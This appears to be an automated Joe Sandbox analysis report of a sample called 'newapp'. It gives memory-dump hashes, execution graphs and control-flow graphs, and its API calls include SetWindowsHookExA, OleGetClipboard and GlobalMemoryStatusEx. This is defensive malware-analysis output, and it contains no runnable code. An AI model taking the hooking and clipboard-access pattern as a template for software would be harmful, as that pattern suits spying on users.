                                                                                                            • Instruction Fuzzy Hash: BE214971514248DFDB05DF98C5C0BA6BFA5FB84328F20C56DD9094B257C376D846CB61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2019745390.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_12bd000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 568b7914e08143248ee0e8934c31e8587209016a874f1c7179c28804f4712950
                                                                                                            • Instruction ID: 5e28623922ace6eacbee30ce0c6261aee7781420f6e22c444480c9b4d91553ce
                                                                                                            • Opcode Fuzzy Hash: 568b7914e08143248ee0e8934c31e8587209016a874f1c7179c28804f4712950
                                                                                                            • Instruction Fuzzy Hash: 902180755083849FCB02CF64D9D4B51BF71EB46318F28C5DAD9498F2A7C33A981ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2019671280.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_12ad000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                            • Instruction ID: c447ee94c47691b5bb531c5337c5268fa1c7974c97ebfd5a1366affd747205df
                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                            • Instruction Fuzzy Hash: FA110376504244CFCB02CF54D9C4B16BF72FB84314F24C5A9DA090B657C33AE45ACBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2019671280.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_12ad000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                            • Instruction ID: a8aad74fa4e0dca995f6d51689e624780236ba91e5d73685c5ae21cb41b9eb15
                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                            • Instruction Fuzzy Hash: 5B110376404284CFDB02CF44D5C4B56BF71FB94324F24C2A9DA090B657C33AE45ACBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2019745390.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_12bd000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                            • Instruction ID: 609fe3e7b0d2a3b9309de8f747003eef52541bbeaae12e5f70f10728097c0eb8
                                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                            • Instruction Fuzzy Hash: 4511BB75504284DFDB02CF54C5C4B95BFA1FB84328F24C6AAD9494B297C33AD40ACB61

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:13%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:211
                                                                                                            Total number of Limit Nodes:22
                                                                                                            execution_graph 40496 69c6758 40497 69c67c0 CreateWindowExW 40496->40497 40499 69c687c 40497->40499 40499->40499 40730 69ca2a8 40731 69ca2a9 GetCurrentProcess 40730->40731 40733 69ca339 40731->40733 40734 69ca340 GetCurrentThread 40731->40734 40733->40734 40735 69ca37d GetCurrentProcess 40734->40735 40736 69ca376 40734->40736 40737 69ca3b3 40735->40737 40736->40735 40738 69ca3db GetCurrentThreadId 40737->40738 40739 69ca40c 40738->40739 40740 69cdea8 40741 69cdeec SetWindowsHookExA 40740->40741 40743 69cdf32 40741->40743 40500 f7d030 40501 f7d048 40500->40501 40502 f7d0a2 40501->40502 40509 69c690b 40501->40509 40515 69cb0d1 40501->40515 40524 69c6a30 40501->40524 40528 69c6910 40501->40528 40534 69c4124 40501->40534 40538 69c4134 40501->40538 40510 69c6936 40509->40510 40511 69c4124 GetModuleHandleW 40510->40511 40512 69c6942 40511->40512 40513 69c4134 2 API calls 40512->40513 40514 69c6957 40513->40514 40514->40502 40516 69cb0da 40515->40516 40517 69cb0ea 40515->40517 40516->40502 40518 69cb161 40517->40518 40520 69cb151 40517->40520 40558 69ca274 40518->40558 40546 69cb690 40520->40546 40552 69cb650 40520->40552 40521 69cb15f 40521->40521 40525 69c6a34 40524->40525 40618 69c415c 40525->40618 40527 69c6a47 40527->40502 40529 69c6936 40528->40529 40530 69c4124 GetModuleHandleW 40529->40530 40531 69c6942 40530->40531 40532 69c4134 2 API calls 40531->40532 40533 69c6957 40532->40533 40533->40502 40535 69c412f 40534->40535 40536 69c415c GetModuleHandleW 40535->40536 40537 69c6a47 40536->40537 40537->40502 40539 69c413f 40538->40539 40540 69cb161 40539->40540 40542 69cb151 40539->40542 40541 69ca274 2 API calls 40540->40541 40543 69cb15f 40541->40543 40544 69cb690 2 API calls 40542->40544 40545 69cb650 2 API calls 40542->40545 40543->40543 40544->40543 40545->40543 40547 69cb69e 40546->40547 40548 69ca274 2 API calls 40547->40548 40549 69cb77a 40547->40549 40565 69cbb70 40547->40565 40569 69cbb60 40547->40569 40548->40547 40549->40521 40553 69cb655 40552->40553 40554 69ca274 2 API calls 40553->40554 40555 69cb77a 40553->40555 40556 69cbb70 OleInitialize 40553->40556 40557 69cbb60 OleInitialize 40553->40557 40554->40553 40555->40521 40556->40553 40557->40553 40559 69ca27f 40558->40559 40560 69cb87c 40559->40560 40561 69cb7d2 40559->40561 40563 69c4134 OleInitialize 40560->40563 40562 69cb82a CallWindowProcW 40561->40562 40564 69cb7d9 40561->40564 40562->40564 40563->40564 40564->40521 40566 69cbb8f 40565->40566 40567 69cbc67 40566->40567 40573 69cbd18 40566->40573 40567->40547 40571 69cbb66 40569->40571 40570 69cbb56 40570->40547 40571->40570 40572 69cbd18 OleInitialize 40571->40572 40572->40571 40575 69cbd1d 40573->40575 40574 69cbd44 40574->40566 40575->40574 40579 69cbd70 40575->40579 40593 69cbd61 40575->40593 40576 69cbd59 40576->40566 40580 69cbd82 40579->40580 40581 69cbd9d 40580->40581 40583 69cbde1 40580->40583 40591 69cbd70 OleInitialize 40581->40591 40592 69cbd61 OleInitialize 40581->40592 40582 69cbda3 40582->40576 40588 69cbd70 OleInitialize 40583->40588 40590 69cbd61 OleInitialize 40583->40590 40607 69cbf11 40583->40607 40584 69cbe6b 40584->40576 40585 69cbe5d 40585->40584 40611 69cb4dc 40585->40611 40588->40585 40590->40585 40591->40582 40592->40582 40594 69cbd6a 40593->40594 40595 69cbd9d 40594->40595 40597 69cbde1 40594->40597 40602 69cbd70 OleInitialize 40595->40602 40603 69cbd61 OleInitialize 40595->40603 40596 69cbda3 40596->40576 40604 69cbd70 OleInitialize 40597->40604 40605 69cbf11 OleInitialize 40597->40605 40606 69cbd61 OleInitialize 40597->40606 40598 69cbe6b 40598->40576 40599 69cbe5d 40599->40598 40600 69cb4dc OleInitialize 40599->40600 40601 69cbf31 40600->40601 40601->40576 40602->40596 40603->40596 40604->40599 40605->40599 40606->40599 40608 69cbf28 40607->40608 40609 69cb4dc OleInitialize 40608->40609 40610 69cbf31 40609->40610 40610->40585 40612 69cb4e7 40611->40612 40614 69cbf31 40612->40614 40615 69cb4ec 40612->40615 40614->40576 40616 69cbf98 OleInitialize 40615->40616 40617 69cbffc 40616->40617 40617->40614 40619 69c4167 40618->40619 40621 69c6b17 40619->40621 40622 69c3ffc 40619->40622 40623 69c56b0 GetModuleHandleW 40622->40623 40625 69c5725 40623->40625 40625->40621 40626 69ca4f0 DuplicateHandle 40627 69ca586 40626->40627 40744 69cc0e0 40745 69cc13a OleGetClipboard 40744->40745 40746 69cc17a 40745->40746 40628 2a60848 40630 2a6084e 40628->40630 40629 2a6091b 40630->40629 40633 2a61457 40630->40633 40640 2a61340 40630->40640 40634 2a61356 40633->40634 40635 2a61454 40634->40635 40638 2a61457 7 API calls 40634->40638 40647 2a680f9 40634->40647 40652 69c3ab8 40634->40652 40658 69c3ac8 40634->40658 40635->40630 40638->40634 40642 2a61356 40640->40642 40641 2a61454 40641->40630 40642->40641 40643 2a680f9 3 API calls 40642->40643 40644 69c3ab8 4 API calls 40642->40644 40645 69c3ac8 4 API calls 40642->40645 40646 2a61457 7 API calls 40642->40646 40643->40642 40644->40642 40645->40642 40646->40642 40648 2a68103 40647->40648 40649 2a681b9 40648->40649 40664 69dfa50 40648->40664 40669 69dfa60 40648->40669 40649->40634 40653 69c3ac5 40652->40653 40656 69c3b8b 40653->40656 40674 69c3824 40653->40674 40655 69c3b51 40679 69c3844 40655->40679 40656->40634 40659 69c3ada 40658->40659 40660 69c3824 3 API calls 40659->40660 40662 69c3b8b 40659->40662 40661 69c3b51 40660->40661 40663 69c3844 KiUserCallbackDispatcher 40661->40663 40662->40634 40663->40662 40666 69dfa75 40664->40666 40665 69dfc8a 40665->40649 40666->40665 40667 69dfcb0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40666->40667 40668 69dfca0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40666->40668 40667->40666 40668->40666 40670 69dfa75 40669->40670 40671 69dfc8a 40670->40671 40672 69dfcb0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40670->40672 40673 69dfca0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40670->40673 40671->40649 40672->40670 40673->40670 40675 69c382f 40674->40675 40683 69c4c6b 40675->40683 40689 69c4c80 40675->40689 40676 69c3d2a 40676->40655 40680 69c384f 40679->40680 40682 69cbabb 40680->40682 40726 69cb2b4 40680->40726 40682->40656 40684 69c4c78 40683->40684 40695 69c51f0 40684->40695 40685 69c4d2e 40686 69c3ffc GetModuleHandleW 40685->40686 40687 69c4d5a 40685->40687 40686->40687 40690 69c4cab 40689->40690 40694 69c51f0 3 API calls 40690->40694 40691 69c4d2e 40692 69c3ffc GetModuleHandleW 40691->40692 40693 69c4d5a 40691->40693 40692->40693 40694->40691 40696 69c51f4 40695->40696 40697 69c52ae 40696->40697 40700 69c5370 40696->40700 40713 69c5360 40696->40713 40701 69c5385 40700->40701 40702 69c3ffc GetModuleHandleW 40701->40702 40703 69c53a9 40701->40703 40702->40703 40704 69c3ffc GetModuleHandleW 40703->40704 40707 69c5574 40703->40707 40705 69c54fa 40704->40705 40706 69c55cf 40705->40706 40705->40707 40708 69c3ffc GetModuleHandleW 40705->40708 40706->40697 40707->40706 40709 69c56f9 GetModuleHandleW 40707->40709 40711 69c5548 40708->40711 40710 69c5725 40709->40710 40710->40697 40711->40707 40712 69c3ffc GetModuleHandleW 40711->40712 40712->40707 40714 69c5364 40713->40714 40715 69c3ffc GetModuleHandleW 40714->40715 40716 69c53a9 40714->40716 40715->40716 40717 69c3ffc GetModuleHandleW 40716->40717 40725 69c5574 40716->40725 40718 69c54fa 40717->40718 40719 69c55cf 40718->40719 40720 69c3ffc GetModuleHandleW 40718->40720 40718->40725 40719->40697 40723 69c5548 40720->40723 40721 69c56f9 GetModuleHandleW 40722 69c5725 40721->40722 40722->40697 40724 69c3ffc GetModuleHandleW 40723->40724 40723->40725 40724->40725 40725->40719 40725->40721 40727 69cbad0 KiUserCallbackDispatcher 40726->40727 40729 69cbb3e 40727->40729 40729->40680
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: dd1e2c02e1044c1309d3327e96df945c2b0cb78377de1b99a1bd621c66e9e0cd
                                                                                                            • Instruction ID: 5ffeb09dff4239859dfeb5140fe6fba668860b12092ade202d561bf5cd03d7e5
                                                                                                            • Opcode Fuzzy Hash: dd1e2c02e1044c1309d3327e96df945c2b0cb78377de1b99a1bd621c66e9e0cd
                                                                                                            • Instruction Fuzzy Hash: 62526FB0E002099FDF64CB68D5807AEB7B9EB85310F25C83AE405EB759DA35DC85CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 420 69d3570-69d3591 422 69d3593-69d3596 420->422 423 69d35bc-69d35bf 422->423 424 69d3598-69d35b7 422->424 425 69d35c5-69d35e4 423->425 426 69d3d60-69d3d62 423->426 424->423 434 69d35fd-69d3607 425->434 435 69d35e6-69d35e9 425->435 428 69d3d69-69d3d6c 426->428 429 69d3d64 426->429 428->422 431 69d3d72-69d3d7b 428->431 429->428 438 69d360d-69d361e call 69d315c 434->438 435->434 436 69d35eb-69d35fb 435->436 436->438 441 69d3623-69d3628 438->441 442 69d362a-69d3630 441->442 443 69d3635-69d3912 441->443 442->431 464 69d3918-69d39c7 443->464 465 69d3d52-69d3d5f 443->465 474 69d39c9-69d39ee 464->474 475 69d39f0 464->475 477 69d39f9-69d3a0c call 69d3168 474->477 475->477 480 69d3d39-69d3d45 477->480 481 69d3a12-69d3a34 call 69d3174 477->481 480->464 482 69d3d4b 480->482 481->480 485 69d3a3a-69d3a44 481->485 482->465 485->480 486 69d3a4a-69d3a55 485->486 486->480 487 69d3a5b-69d3b31 486->487 499 69d3b3f-69d3b6f 487->499 500 69d3b33-69d3b35 487->500 504 69d3b7d-69d3b89 499->504 505 69d3b71-69d3b73 499->505 500->499 506 69d3be9-69d3bed 504->506 507 69d3b8b-69d3b8f 504->507 505->504 509 69d3d2a-69d3d33 506->509 510 69d3bf3-69d3c2f 506->510 507->506 508 69d3b91-69d3bbb 507->508 517 69d3bbd-69d3bbf 508->517 518 69d3bc9-69d3be6 call 69d3180 508->518 509->480 509->487 521 69d3c3d-69d3c4b 510->521 522 69d3c31-69d3c33 510->522 517->518 518->506 525 69d3c4d-69d3c58 521->525 526 69d3c62-69d3c6d 521->526 522->521 525->526 531 69d3c5a 525->531 529 69d3c6f-69d3c75 526->529 530 69d3c85-69d3c96 526->530 532 69d3c79-69d3c7b 529->532 533 69d3c77 529->533 535 69d3cae-69d3cba 530->535 536 69d3c98-69d3c9e 530->536 531->526 532->530 533->530 540 69d3cbc-69d3cc2 535->540 541 69d3cd2-69d3d23 535->541 537 69d3ca0 536->537 538 69d3ca2-69d3ca4 536->538 537->535 538->535 542 69d3cc4 540->542 543 69d3cc6-69d3cc8 540->543 541->509 542->541 543->541
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 40fc85ae6d1a85f07d0ac13de934da108a29485bc747d5e558ed9c8d5ebec154
                                                                                                            • Instruction ID: 126b66aaa1356f89dcd2e989db7e51fad9a72c14795d5d317c58290d3d1e99dd
                                                                                                            • Opcode Fuzzy Hash: 40fc85ae6d1a85f07d0ac13de934da108a29485bc747d5e558ed9c8d5ebec154
                                                                                                            • Instruction Fuzzy Hash: 1F321031E1071A8FCB54EF75C854A9DB7B6BF89300F64C66AD409AB254EF309D85CB81

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1525 69d7e68-69d7e86 1528 69d7e88-69d7e8b 1525->1528 1529 69d7e8d-69d7ea7 1528->1529 1530 69d7eac-69d7eaf 1528->1530 1529->1530 1531 69d7eb1-69d7ecd 1530->1531 1532 69d7ed2-69d7ed5 1530->1532 1531->1532 1533 69d7ed7-69d7ee1 1532->1533 1534 69d7ee2-69d7ee5 1532->1534 1537 69d7efc-69d7efe 1534->1537 1538 69d7ee7-69d7ef5 1534->1538 1539 69d7f05-69d7f08 1537->1539 1540 69d7f00 1537->1540 1544 69d7f0e-69d7f24 1538->1544 1545 69d7ef7 1538->1545 1539->1528 1539->1544 1540->1539 1547 69d813f-69d8149 1544->1547 1548 69d7f2a-69d7f33 1544->1548 1545->1537 1549 69d7f39-69d7f56 1548->1549 1550 69d814a-69d8158 1548->1550 1560 69d812c-69d8139 1549->1560 1561 69d7f5c-69d7f84 1549->1561 1553 69d81af-69d81bc 1550->1553 1554 69d815a 1550->1554 1559 69d81c7-69d81c9 1553->1559 1555 69d815c 1554->1555 1556 69d8161-69d817f 1554->1556 1555->1556 1558 69d8181-69d8184 1556->1558 1562 69d81a7-69d81aa 1558->1562 1563 69d8186-69d81a2 1558->1563 1564 69d81cb-69d81d1 1559->1564 1565 69d81e1-69d81e5 1559->1565 1560->1547 1560->1548 1561->1560 1582 69d7f8a-69d7f93 1561->1582 1562->1553 1569 69d8257-69d825a 1562->1569 1563->1562 1570 69d81d5-69d81d7 1564->1570 1571 69d81d3 1564->1571 1567 69d81e7-69d81f1 1565->1567 1568 69d81f3 1565->1568 1574 69d81f8-69d81fa 1567->1574 1568->1574 1572 69d848f-69d8491 1569->1572 1573 69d8260-69d826f 1569->1573 1570->1565 1571->1565 1576 69d8498-69d849b 1572->1576 1577 69d8493 1572->1577 1586 69d828e-69d82d2 1573->1586 1587 69d8271-69d828c 1573->1587 1579 69d81fc-69d81ff 1574->1579 1580 69d8211-69d824a 1574->1580 1576->1558 1581 69d84a1-69d84aa 1576->1581 1577->1576 1579->1581 1580->1573 1606 69d824c-69d8256 1580->1606 1582->1550 1585 69d7f99-69d7fb5 1582->1585 1593 69d7fbb-69d7fe5 1585->1593 1594 69d811a-69d8126 1585->1594 1595 69d82d8-69d82e9 1586->1595 1596 69d8463-69d8479 1586->1596 1587->1586 1612 69d7feb-69d8013 1593->1612 1613 69d8110-69d8115 1593->1613 1594->1560 1594->1582 1602 69d82ef-69d830c 1595->1602 1603 69d844e-69d845d 1595->1603 1596->1572 1602->1603 1614 69d8312-69d8408 call 69d6690 1602->1614 1603->1595 1603->1596 1612->1613 1619 69d8019-69d8047 1612->1619 1613->1594 1663 69d840a-69d8414 1614->1663 1664 69d8416 1614->1664 1619->1613 1625 69d804d-69d8056 1619->1625 1625->1613 1626 69d805c-69d808e 1625->1626 1634 69d8099-69d80b5 1626->1634 1635 69d8090-69d8094 1626->1635 1634->1594 1637 69d80b7-69d810e call 69d6690 1634->1637 1635->1613 1636 69d8096 1635->1636 1636->1634 1637->1594 1665 69d841b-69d841d 1663->1665 1664->1665 1665->1603 1666 69d841f-69d8424 1665->1666 1667 69d8426-69d8430 1666->1667 1668 69d8432 1666->1668 1669 69d8437-69d8439 1667->1669 1668->1669 1669->1603 1670 69d843b-69d8447 1669->1670 1670->1603
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 288d326456e1c5ab8b03151f45e5e245088ccfd2c049323bc5bc11ae484e3c23
                                                                                                            • Instruction ID: e4a916d74be0e30dc51a5f5e1e1ec620ff9c06d8eeb68f85ef382de98fd3a206
                                                                                                            • Opcode Fuzzy Hash: 288d326456e1c5ab8b03151f45e5e245088ccfd2c049323bc5bc11ae484e3c23
                                                                                                            • Instruction Fuzzy Hash: 41029C30B002059FDB54DB68D990AAEB7E6EF84314F24C879E416DB795DB31EC46CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ccdc756365d3bd4a2d98f8344d5795910065e31688c55f3302b93e1cc82549f3
                                                                                                            • Instruction ID: 30aeeffa32655b1641f87b8cf61920f3dcf051ce7ce6e1639ad7eb1a953429c3
                                                                                                            • Opcode Fuzzy Hash: ccdc756365d3bd4a2d98f8344d5795910065e31688c55f3302b93e1cc82549f3
                                                                                                            • Instruction Fuzzy Hash: E462AC34A002049FDB54DB68D984AADBBF6EF88314F24C479E806DB790DB35ED46CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0951cb57e96259e7fbca586e15fd1e3b40e11f559d7019c38ebf544c40c41b43
                                                                                                            • Instruction ID: fa5097bd141985382962739f49d74e05122fec5cb7919667c811ce4b56571c47
                                                                                                            • Opcode Fuzzy Hash: 0951cb57e96259e7fbca586e15fd1e3b40e11f559d7019c38ebf544c40c41b43
                                                                                                            • Instruction Fuzzy Hash: 61325D34A00205DFDB54DB68D980BADBBBAEB88314F20C539E405EB755DB35EC46CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20c72f3b5631a84cbdca0e1b933fcef551ec6658d1dec0abf4dc4eb18cb63065
                                                                                                            • Instruction ID: ad40a6a2aa2343988f9ccc613f5d7623e52232401f2652e229d323df393eac9e
                                                                                                            • Opcode Fuzzy Hash: 20c72f3b5631a84cbdca0e1b933fcef551ec6658d1dec0abf4dc4eb18cb63065
                                                                                                            • Instruction Fuzzy Hash: E522D175F002159FDF60DF68C8846AEBBA6EB84320F26C43AE859DB745DA34DC41CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 69dadb0-69dadce 3 69dadd0-69dadd3 0->3 4 69dadd5-69dadf1 3->4 5 69dadf6-69dadf9 3->5 4->5 6 69dadfb-69dadff 5->6 7 69dae0a-69dae0d 5->7 9 69dafdc-69dafe6 6->9 10 69dae05 6->10 11 69dae1d-69dae20 7->11 12 69dae0f-69dae18 7->12 10->7 13 69dafcd-69dafd6 11->13 14 69dae26-69dae29 11->14 12->11 13->9 15 69dae6c-69dae75 13->15 17 69dae3d-69dae40 14->17 18 69dae2b-69dae38 14->18 21 69dae7b-69dae7f 15->21 22 69dafe7-69db01e 15->22 19 69dae5a-69dae5d 17->19 20 69dae42-69dae55 17->20 18->17 24 69dae5f-69dae64 19->24 25 69dae67-69dae6a 19->25 20->19 26 69dae84-69dae86 21->26 31 69db020-69db023 22->31 24->25 25->15 25->26 29 69dae8d-69dae90 26->29 30 69dae88 26->30 29->3 32 69dae96-69daeba 29->32 30->29 33 69db025 31->33 34 69db032-69db035 31->34 47 69dafca 32->47 48 69daec0-69daecf 32->48 125 69db025 call 69db318 33->125 126 69db025 call 69db307 33->126 36 69db29e-69db2a1 34->36 37 69db03b-69db076 34->37 38 69db2ae-69db2b1 36->38 39 69db2a3-69db2ad 36->39 45 69db07c-69db088 37->45 46 69db269-69db27c 37->46 43 69db2d4-69db2d7 38->43 44 69db2b3-69db2cf 38->44 40 69db02b-69db02d 40->34 49 69db2d9-69db2dd 43->49 50 69db2e8-69db2ea 43->50 44->43 59 69db0a8-69db0ec 45->59 60 69db08a-69db0a3 45->60 54 69db27e 46->54 47->13 61 69daee7-69daf22 call 69d6690 48->61 62 69daed1-69daed7 48->62 49->37 51 69db2e3 49->51 52 69db2ec 50->52 53 69db2f1-69db2f4 50->53 51->50 52->53 53->31 57 69db2fa-69db304 53->57 54->36 77 69db0ee-69db100 59->77 78 69db108-69db147 59->78 60->54 79 69daf3a-69daf51 61->79 80 69daf24-69daf2a 61->80 64 69daed9 62->64 65 69daedb-69daedd 62->65 64->61 65->61 77->78 86 69db14d-69db228 call 69d6690 78->86 87 69db22e-69db243 78->87 92 69daf69-69daf7a 79->92 93 69daf53-69daf59 79->93 81 69daf2c 80->81 82 69daf2e-69daf30 80->82 81->79 82->79 86->87 87->46 99 69daf7c-69daf82 92->99 100 69daf92-69dafc3 92->100 95 69daf5d-69daf5f 93->95 96 69daf5b 93->96 95->92 96->92 101 69daf84 99->101 102 69daf86-69daf88 99->102 100->47 101->100 102->100 125->40 126->40
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: 632abe6ecb7becc5c946e6534a9ae40cc8f0bcb938a074b243766360f7d2498c
                                                                                                            • Instruction ID: 92cee9489e372aba195d296e73ac7a95c6b91d898719dc9eb2998aec23711d77
                                                                                                            • Opcode Fuzzy Hash: 632abe6ecb7becc5c946e6534a9ae40cc8f0bcb938a074b243766360f7d2498c
                                                                                                            • Instruction Fuzzy Hash: AAE17B31E1020A8FCB55DF69D9846AEB7B6AF85304F20C939E409EB758DB31DC46CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 551 69ca299-69ca2a0 552 69ca2a9-69ca337 GetCurrentProcess 551->552 553 69ca2a2-69ca2a8 551->553 559 69ca339-69ca33f 552->559 560 69ca340-69ca374 GetCurrentThread 552->560 553->552 559->560 561 69ca37d-69ca3b1 GetCurrentProcess 560->561 562 69ca376-69ca37c 560->562 564 69ca3ba-69ca3d5 call 69ca478 561->564 565 69ca3b3-69ca3b9 561->565 562->561 568 69ca3db-69ca40a GetCurrentThreadId 564->568 565->564 569 69ca40c-69ca412 568->569 570 69ca413-69ca475 568->570 569->570
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 069CA326
                                                                                                            • GetCurrentThread.KERNEL32 ref: 069CA363
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 069CA3A0
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 069CA3F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 803de0d35652acadbd47b6209bc04760c4ac08965224445c92414e83fead20ff
                                                                                                            • Instruction ID: 9953badcf693d587ada379652112ea863b8250df1cb9c54da874d53749928778
                                                                                                            • Opcode Fuzzy Hash: 803de0d35652acadbd47b6209bc04760c4ac08965224445c92414e83fead20ff
                                                                                                            • Instruction Fuzzy Hash: 695179B09003099FDB44CFAAD948BDEBBF5EF48314F208459E00AA7760D7349984CF66

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 577 69ca2a8-69ca337 GetCurrentProcess 583 69ca339-69ca33f 577->583 584 69ca340-69ca374 GetCurrentThread 577->584 583->584 585 69ca37d-69ca3b1 GetCurrentProcess 584->585 586 69ca376-69ca37c 584->586 588 69ca3ba-69ca3d5 call 69ca478 585->588 589 69ca3b3-69ca3b9 585->589 586->585 592 69ca3db-69ca40a GetCurrentThreadId 588->592 589->588 593 69ca40c-69ca412 592->593 594 69ca413-69ca475 592->594 593->594
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 069CA326
